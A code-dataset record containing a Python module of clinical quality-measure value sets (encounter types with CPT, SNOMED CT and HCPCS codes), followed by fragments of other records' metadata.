| 0
| 0
| 0
|
0
| 4
|
1c67f4ce1c24e807f5f277ab2d49968e23adb702
| 36,666
|
py
|
Python
|
canvas_workflow_helpers/value_sets/v2021/encounter_performed.py
|
canvas-medical/open-source-sdk
|
a7a17f1950f63c59646037358c9a437dbd827413
|
[
"Apache-2.0"
] | 12
|
2022-02-25T18:15:43.000Z
|
2022-03-30T18:43:02.000Z
|
canvas_workflow_helpers/value_sets/v2021/encounter_performed.py
|
ReyBernDia/open-source-sdk
|
d6570a6096658e5da70262bb4fbcedae12ca8523
|
[
"Apache-2.0"
] | 1
|
2022-03-18T22:21:03.000Z
|
2022-03-18T22:22:36.000Z
|
canvas_workflow_helpers/value_sets/v2021/encounter_performed.py
|
ReyBernDia/open-source-sdk
|
d6570a6096658e5da70262bb4fbcedae12ca8523
|
[
"Apache-2.0"
] | 4
|
2022-02-25T18:15:33.000Z
|
2022-02-25T19:14:17.000Z
|
from ..value_set import ValueSet
class AcuteInpatient(ValueSet):
"""
**Clinical Focus:** This value set contains concepts related to acute inpatient visits.
**Data Element Scope:** This value set may use Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with comprehensive history, evaluation, and management of a patient in an acute inpatient setting. This is a grouping value set of CPT and SNOMED codes.
**Exclusion Criteria:** No exclusions.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1083'
VALUE_SET_NAME = 'Acute Inpatient'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'99221',
'99222',
'99223',
'99231',
'99232',
'99233',
'99238',
'99239',
'99251',
'99252',
'99253',
'99254',
'99255',
'99291'
}
SNOMEDCT = {
'112689000',
'1505002',
'15584006',
'183450002',
'183481006',
'183487005',
'183488000',
'183489008',
'183491000',
'183492007',
'183493002',
'183494008',
'183495009',
'183496005',
'183497001',
'183498006',
'183499003',
'183500007',
'183501006',
'183502004',
'183503009',
'183504003',
'183505002',
'183506001',
'183507005',
'183508000',
'183509008',
'183510003',
'183511004',
'183512006',
'235313004',
'25986004',
'287927002',
'304566005',
'305337004',
'305338009',
'305341000',
'305342007',
'305350003',
'305354007',
'305355008',
'305356009',
'305357000',
'305358005',
'305359002',
'305360007',
'305361006',
'305362004',
'305363009',
'305364003',
'305365002',
'305366001',
'305367005',
'305368000',
'305369008',
'305370009',
'305371008',
'305372001',
'305374000',
'305375004',
'305376003',
'305377007',
'305378002',
'305379005',
'305380008',
'305382000',
'305383005',
'305384004',
'305385003',
'305386002',
'305387006',
'305388001',
'305389009',
'305390000',
'305391001',
'305392008',
'305393003',
'305394009',
'305395005',
'305396006',
'305397002',
'305399004',
'305400006',
'305401005',
'305402003',
'305403008',
'305404002',
'305405001',
'305406000',
'305407009',
'305408004',
'305409007',
'305410002',
'305411003',
'305412005',
'305413000',
'305414006',
'305415007',
'305416008',
'305417004',
'305418009',
'305419001',
'305420007',
'305421006',
'305422004',
'305423009',
'305424003',
'305425002',
'305426001',
'305427005',
'305428000',
'305429008',
'305430003',
'305431004',
'305432006',
'305433001',
'305434007',
'305435008',
'306732000',
'306803007',
'306967009',
'308251003',
'308252005',
'308253000',
'310361003',
'3241000175106',
'32485007',
'373113001',
'397769005',
'398162007',
'405614004',
'417005',
'432621000124105',
'442281000124108',
'447941000124106',
'448421000124105',
'448431000124108',
'448441000124103',
'448851000124103',
'4563007',
'45702004',
'47348005',
'48183000',
'51032003',
'51501005',
'5161006',
'52748007',
'60059000',
'63551005',
'699124006',
'70755000',
'71290004',
'76193006',
'76464004',
'81672003',
'82942009',
'8715000'
}
class CareServicesInLongTermResidentialFacility(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent patients living in assisted living, domiciliary care or rest homes who have had an interaction with a member of their medical team.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with services provided to new and established patients living in assisted living, domiciliary care or rest home. This is a grouping value set of CPT codes.
**Exclusion Criteria:** Excludes visits in settings other than assisted living, domiciliary care or rest homes.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1014'
VALUE_SET_NAME = 'Care Services in Long-Term Residential Facility'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'99324',
'99325',
'99326',
'99327',
'99328',
'99334',
'99335',
'99336',
'99337'
}
SNOMEDCT = {
'209099002',
'210098006'
}
class ClinicalOralEvaluation(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent patients who had a clinical oral evaluation.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with periodic, limited (problem focused
**Exclusion Criteria:** No exclusions.
"""
OID = '2.16.840.1.113883.3.464.1003.125.12.1003'
VALUE_SET_NAME = 'Clinical Oral Evaluation'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CDT = {
'D0120',
'D0140',
'D0145',
'D0150',
'D0160',
'D0170',
'D0180'
}
class ContactOrOfficeVisit(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent contact and office visits for new and established patients, and includes in-person, telephone, online, and other visit types related to depression encounters.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with outpatient contact and office visits in which a patient may be evaluated for depression. This groups CPT and HCPCS codes.
**Exclusion Criteria:** Excludes inpatients for purposes of the index event. The majority of CPT codes are specified for outpatient visit types; however psychiatry and psychotherapy visits can be used in the inpatient setting.
"""
OID = '2.16.840.1.113762.1.4.1080.5'
VALUE_SET_NAME = 'Contact or Office Visit'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'90791',
'90792',
'90832',
'90834',
'90837',
'99201',
'99202',
'99203',
'99204',
'99205',
'99211',
'99212',
'99213',
'99214',
'99215',
'99421',
'99422',
'99423',
'99441',
'99442',
'99443',
'99444'
}
HCPCSLEVELII = {
'G0402',
'G0438',
'G0439',
'G2061',
'G2062',
'G2063'
}
class DetoxificationVisit(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent detoxification visits.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with identifying alcohol and drug detoxification. This is a grouping of SNOMED CT codes.
**Exclusion Criteria:** No exclusions.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1059'
VALUE_SET_NAME = 'Detoxification Visit'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
SNOMEDCT = {
'182969009',
'20093000',
'23915005',
'414054004',
'414056002',
'56876005',
'61480009',
'64297001',
'67516001',
'87106005'
}
class DischargeServicesHospitalInpatient(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent inpatient hospital discharge services.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with identifying hospital discharge day management. This is a grouping of CPT codes.
**Exclusion Criteria:** No exclusions.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1007'
VALUE_SET_NAME = 'Discharge Services - Hospital Inpatient'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'99238',
'99239'
}
class DischargeServicesHospitalInpatientSameDayDischarge(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent inpatient hospital same day discharge services.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with identifying observation or inpatient care for the evaluation and management of a patient that results in discharge on the same date of admission. This is a grouping of CPT codes.
**Exclusion Criteria:** No exclusions.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1006'
VALUE_SET_NAME = 'Discharge Services - Hospital Inpatient Same Day Discharge'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'99234',
'99235',
'99236'
}
class DischargeServicesNursingFacility(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent patients who have been discharged from a nursing facility.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with discharge from a nursing facility, including a final examination, instructions for continuing care and preparation of discharge records, prescriptions, and referral forms. Discharge services encounters can be less than or over 30 minutes. This is a grouping of CPT codes.
**Exclusion Criteria:** Excludes discharges from settings other than a nursing facility.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1013'
VALUE_SET_NAME = 'Discharge Services - Nursing Facility'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'99315',
'99316'
}
class DischargeServicesNursingFacility_1065(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent patients who have been discharged from a nursing facility.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with discharge from a nursing facility, including a final examination, instructions for continuing care and preparation of discharge records, prescriptions, and referral forms. Discharge services encounters can be less than or over 30 minutes. This is a grouping of CPT codes.
**Exclusion Criteria:** Excludes discharges from settings other than a nursing facility.
"""
OID = '2.16.840.1.113883.3.464.1003.101.11.1065'
VALUE_SET_NAME = 'Discharge Services - Nursing Facility'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'99315',
'99316'
}
class Ed(ValueSet):
"""
**Clinical Focus:** This value set contains concepts related to an ED visit.
**Data Element Scope:** This value set may use Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with comprehensive history, evaluation, and management of a patient in an ED. This is a grouping value set of CPT and SNOMED codes.
**Exclusion Criteria:** No exclusions.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1085'
VALUE_SET_NAME = 'ED'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'99281',
'99282',
'99283',
'99284',
'99285'
}
SNOMEDCT = {
'4525004'
}
class EmergencyDepartmentVisit(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent patients who have had an interaction with a member of their medical care team in the emergency department.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with care provided to new and established patients in the emergency department. This is a value set grouping that includes CPT and SNOMED CT codes.
**Exclusion Criteria:** Excludes services not performed in the emergency department, including critical care and observation services.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1010'
VALUE_SET_NAME = 'Emergency Department Visit'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'99281',
'99282',
'99283',
'99284',
'99285'
}
SNOMEDCT = {
'4525004'
}
class FrailtyEncounter(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent nursing care services provided to frail patients.
**Data Element Scope:** This value set may use Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with nursing care and home care services provided to frail patients. This is a grouping of CPT, HCPCS, and SNOMEDCT codes.
**Exclusion Criteria:** No exclusions.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1088'
VALUE_SET_NAME = 'Frailty Encounter'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'99504',
'99509'
}
HCPCSLEVELII = {
'G0162',
'G0299',
'G0300',
'G0493',
'G0494',
'S0271',
'S0311',
'S9123',
'S9124',
'T1000',
'T1001',
'T1002',
'T1003',
'T1004',
'T1005',
'T1019',
'T1020',
'T1021',
'T1022',
'T1030',
'T1031'
}
SNOMEDCT = {
'413467001'
}
class HomeHealthcareServices(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent patients who have had a home health visit by a provider for the evaluation or management of a new or existing patient.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with home visits for the evaluation and management of a new or established patient. This is a grouping value set of CPT and SNOMED CT codes.
**Exclusion Criteria:** No exclusions.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1016'
VALUE_SET_NAME = 'Home Healthcare Services'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'99341',
'99342',
'99343',
'99344',
'99345',
'99347',
'99348',
'99349',
'99350'
}
SNOMEDCT = {
'185460008',
'185462000',
'185466002',
'185467006',
'185468001',
'185470005',
'225929007',
'315205008',
'439708006',
'698704008',
'704126008'
}
class HospitalInpatientVisitInitial(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent inpatient hospital visits.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with initial hospital care for the evaluation and management of a patient. This is a grouping of CPT codes.
**Exclusion Criteria:** No exclusions.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1004'
VALUE_SET_NAME = 'Hospital Inpatient Visit - Initial'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'99221',
'99222',
'99223'
}
class HospitalObservationCareInitial(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent initial inpatient hospital observation care.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with initial observation care for the evaluation and management of a patient. This is a grouping of CPT codes.
**Exclusion Criteria:** No exclusions.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1002'
VALUE_SET_NAME = 'Hospital Observation Care - Initial'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'99218',
'99219',
'99220'
}
class MedicalDisabilityExam(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent work related or medical disability examinations.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with work related or medical disability examinations. This is a grouping of CPT codes.
**Exclusion Criteria:** No exclusions.
"""
OID = '2.16.840.1.113883.3.464.1003.101.11.1233'
VALUE_SET_NAME = 'Medical Disability Exam'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'99455',
'99456'
}
class NonacuteInpatient(ValueSet):
"""
**Clinical Focus:** This value set contains concepts related to nonacute inpatient visits.
**Data Element Scope:** This value set may use Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with comprehensive history, evaluation, and management of a patient in a nonacute inpatient setting. This is a grouping value set of CPT and SNOMED codes.
**Exclusion Criteria:** No exclusions.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1084'
VALUE_SET_NAME = 'Nonacute Inpatient'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'99304',
'99305',
'99306',
'99307',
'99308',
'99309',
'99310',
'99315',
'99316',
'99318',
'99324',
'99325',
'99326',
'99327',
'99328',
'99334',
'99335',
'99336',
'99337'
}
SNOMEDCT = {
'112690009',
'183430001',
'183921001',
'304567001',
'304568006',
'305336008',
'305340004',
'305381007',
'306804001',
'36723004',
'449411000124106',
'449421000124103',
'449431000124100'
}
class NursingFacilityVisit(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent patients who have had an interaction with a member of their medical team on admission to a nursing facility.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with services provided to new and established patients in a nursing facility (skilled, intermediate and long-term care facilities).
**Exclusion Criteria:** Excludes visits in settings other than a nursing facility.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1012'
VALUE_SET_NAME = 'Nursing Facility Visit'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'99304',
'99305',
'99306',
'99307',
'99308',
'99309',
'99310',
'99315',
'99316',
'99318'
}
SNOMEDCT = {
'18170008',
'207195004'
}
class Observation(ValueSet):
"""
**Clinical Focus:** This value set contains concepts related to observation visits.
**Data Element Scope:** This value set may use Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with comprehensive history, evaluation, and management of a patient in an observation care setting. This is a grouping value set of CPT codes.
**Exclusion Criteria:** No exclusions.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1086'
VALUE_SET_NAME = 'Observation'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'99217',
'99218',
'99219',
'99220'
}
class OfficeVisit(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent patients who have had an office or other outpatient visit.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with comprehensive history, evaluation, and management of a patient in an office or outpatient facility. Patient can be presenting with problems that are minor to high severity. This is a grouping value set of CPT codes.
**Exclusion Criteria:** Excludes non-office visits, including telehealth services.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1001'
VALUE_SET_NAME = 'Office Visit'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'99201',
'99202',
'99203',
'99204',
'99205',
'99212',
'99213',
'99214',
'99215'
}
SNOMEDCT = {
'185463005',
'185464004',
'185465003',
'30346009',
'3391000175108',
'37894004',
'439740005'
}
class Outpatient(ValueSet):
"""
**Clinical Focus:** This value set contains concepts related to outpatient visits.
**Data Element Scope:** This value set may use Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with comprehensive history, evaluation, and management of a patient in an outpatient setting. This is a grouping value set of CPT and HCPCS codes.
**Exclusion Criteria:** No exclusions.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1087'
VALUE_SET_NAME = 'Outpatient'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'99201',
'99202',
'99203',
'99204',
'99205',
'99211',
'99212',
'99213',
'99214',
'99215',
'99241',
'99242',
'99243',
'99244',
'99245',
'99341',
'99342',
'99343',
'99344',
'99345',
'99347',
'99348',
'99349',
'99350',
'99381',
'99382',
'99383',
'99384',
'99385',
'99386',
'99387',
'99391',
'99392',
'99393',
'99394',
'99395',
'99396',
'99397',
'99401',
'99402',
'99403',
'99404',
'99411',
'99412',
'99429',
'99455',
'99456',
'99483'
}
HCPCSLEVELII = {
'G0402',
'G0438',
'G0439',
'G0463',
'T1015'
}
class OutpatientConsultation(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent patients who have had an outpatient interaction at an office with a member of their medical care team.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with comprehensive history, evaluation, and management of a patient in an office or outpatient facility. Patient can be presenting with problems that are minor to high severity. This is a grouping value set of CPT and SNOMED CT codes.
**Exclusion Criteria:** Excludes non-office visits, including telehealth services.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1008'
VALUE_SET_NAME = 'Outpatient Consultation'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'99241',
'99242',
'99243',
'99244',
'99245'
}
SNOMEDCT = {
'281036007',
'77406008'
}
class PreventiveCareEstablishedOfficeVisit0To17(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent initial comprehensive preventive medical evaluation, including regular preventive care or care of small problem or preexisting condition that requires no extra work, to be associated with patients 0-17 years of age, that received prior outpatient professional services from the physician practice in the last 3 years.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with ages 0-17, and indicating initial comprehensive preventive medical evaluation, including regular preventive care or care of small problem or preexisting condition that requires no extra work, for a patient that received prior outpatient professional services from the physician practice in the last 3 years. This is a grouping value set of CPT codes.
**Exclusion Criteria:** Excludes codes that are not for comprehensive preventive medical evaluations and codes that are for patients who have not been seen in the last 3 years.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1024'
VALUE_SET_NAME = 'Preventive Care, Established Office Visit, 0 to 17'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'99391',
'99392',
'99393',
'99394'
}
class PreventiveCareServicesEstablishedOfficeVisit18AndUp(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent patients over the age of 18 who have had an established preventive care office visit.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with comprehensive preventive medicine reevaluation and management of an individual the age of 18 years or over. This is a grouping value set of CPT codes.
**Exclusion Criteria:** Excludes non-office visits, including telehealth services.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1025'
VALUE_SET_NAME = 'Preventive Care Services - Established Office Visit, 18 and Up'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'99395',
'99396',
'99397'
}
class PreventiveCareServicesGroupCounseling(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent group counseling services.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with identifying preventive medicine counseling and/or risk factor reduction intervention(s) provided to individuals in a group setting.
**Exclusion Criteria:** No exclusions.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1027'
VALUE_SET_NAME = 'Preventive Care Services - Group Counseling'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'99411',
'99412'
}
class PreventiveCareServicesIndividualCounseling(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent patients who have received preventive medicine counseling and/or risk factor reduction interventions.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with counseling, anticipatory guidance, and risk factor reduction interventions. Preventative care and individual counseling encounters can be 15 to 60 minutes. This is a grouping of CPT codes.
**Exclusion Criteria:** Excludes codes for services performed in the emergency department, including critical care and observation services.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1026'
VALUE_SET_NAME = 'Preventive Care Services-Individual Counseling'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'99401',
'99402',
'99403',
'99404'
}
class PreventiveCareServicesInitialOfficeVisit0To17(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent initial comprehensive preventive medical evaluation, including regular preventive care or care of small problem or preexisting condition that requires no extra work, to be associated with patients 0-17 years of age, that have no prior outpatient professional services from the physician practice in the last 3 years.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with ages 0-17, and that indicate initial comprehensive preventive medical evaluation, including regular preventive care or care of small problem or preexisting condition that requires no extra work, for a patient that has no prior outpatient professional services from the physician practice in the last 3 years. This is a grouping value set of CPT codes.
**Exclusion Criteria:** Excludes codes that are not for comprehensive preventive medical evaluations and codes that are for patients who have been seen in the last 3 years.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1022'
VALUE_SET_NAME = 'Preventive Care Services, Initial Office Visit, 0 to 17'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'99381',
'99382',
'99383',
'99384'
}
class PreventiveCareServicesInitialOfficeVisit18AndUp(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent patients over the age of 18 who have had an initial preventive care office visit.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with comprehensive preventive medicine reevaluation and management of an individual the age of 18 years or over. This is a grouping value set of CPT codes.
**Exclusion Criteria:** Excludes non-office visits, including telehealth services.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1023'
VALUE_SET_NAME = 'Preventive Care Services-Initial Office Visit, 18 and Up'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'99385',
'99386',
'99387'
}
class PreventiveCareServicesOther(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent unlisted preventive medicine services.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with unlisted preventive medicine services. This is a grouping of a CPT codes.
**Exclusion Criteria:** No exclusions.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1030'
VALUE_SET_NAME = 'Preventive Care Services - Other'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'99429'
}
class PsychotherapyAndPharmacologicManagement(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent psychotherapy services.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with identifying psychotherapy services.
**Exclusion Criteria:** No exclusions.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1055'
VALUE_SET_NAME = 'Psychotherapy and Pharmacologic Management'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'90845',
'90847',
'90849',
'90853',
'90875',
'90876'
}
class TelehealthServices(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent telehealth services.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with identifying telehealth services, including telephone and online evaluation and management services.
**Exclusion Criteria:** No exclusions.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1031'
VALUE_SET_NAME = 'Telehealth Services'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'98966',
'98967',
'98968',
'99441',
'99442',
'99443'
}
class TelephoneEvaluation(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent telephone evaluations.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with identifying evaluation and management services to a patient by telephone. This is a grouping of CPT codes.
**Exclusion Criteria:** Excludes telephone evaluation and management services that last for less than five minutes.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1082'
VALUE_SET_NAME = 'Telephone Evaluation'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'99441',
'99442',
'99443'
}
class TelephoneManagement(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent telephone management.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with all relevant codes used to identify assessment and management services to a patient by telephone. This is a grouping of CPT codes.
**Exclusion Criteria:** Excludes telephone assessment and management services that last for less than five minutes.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1053'
VALUE_SET_NAME = 'Telephone Management'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'98966',
'98967',
'98968'
}
class TelephoneVisits(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent telephone visits.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) datatype related to Encounter, Performed.
**Inclusion Criteria:** Includes only relevant concepts associated with identifying assessment, evaluation and management services to a patient by telephone. This is a grouping of CPT codes.
**Exclusion Criteria:** Excludes telephone assessment, evaluation and management services that last for less than five minutes.
"""
OID = '2.16.840.1.113883.3.464.1003.101.12.1080'
VALUE_SET_NAME = 'Telephone Visits'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
CPT = {
'98966',
'98967',
'98968',
'99441',
'99442',
'99443'
}
| 32.679144
| 427
| 0.643975
| 4,160
| 36,666
| 5.650962
| 0.16226
| 0.039816
| 0.034712
| 0.036158
| 0.740471
| 0.733665
| 0.718862
| 0.710184
| 0.684873
| 0.655649
| 0
| 0.165508
| 0.258796
| 36,666
| 1,122
| 428
| 32.679144
| 0.699489
| 0.515928
| 0
| 0.361429
| 0
| 0.047143
| 0.374963
| 0.08009
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.001429
| 0
| 0.262857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
1c70fd09196f88cc8792033f09a381c97eb2dae7
| 51
|
py
|
Python
|
asreviewcontrib/models/__init__.py
|
JTeijema/asreview-XGBoost
|
a682088ef51c6e771be62376f6150f3c9a22726f
|
[
"MIT"
] | null | null | null |
asreviewcontrib/models/__init__.py
|
JTeijema/asreview-XGBoost
|
a682088ef51c6e771be62376f6150f3c9a22726f
|
[
"MIT"
] | null | null | null |
asreviewcontrib/models/__init__.py
|
JTeijema/asreview-XGBoost
|
a682088ef51c6e771be62376f6150f3c9a22726f
|
[
"MIT"
] | null | null | null |
from asreviewcontrib.models.xgboost import XGBoost
| 25.5
| 50
| 0.882353
| 6
| 51
| 7.5
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078431
| 51
| 1
| 51
| 51
| 0.957447
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
1c74b0a5a64db90f3d61758f1cf85c90c5405b0d
| 3,402
|
py
|
Python
|
tests/unit/metrics/test_views.py
|
fairhopeweb/warehouse
|
7d8ef742e8fe6b401190c28ce56761848041c89f
|
[
"Apache-2.0"
] | 3,103
|
2015-01-30T00:24:10.000Z
|
2022-03-31T23:21:39.000Z
|
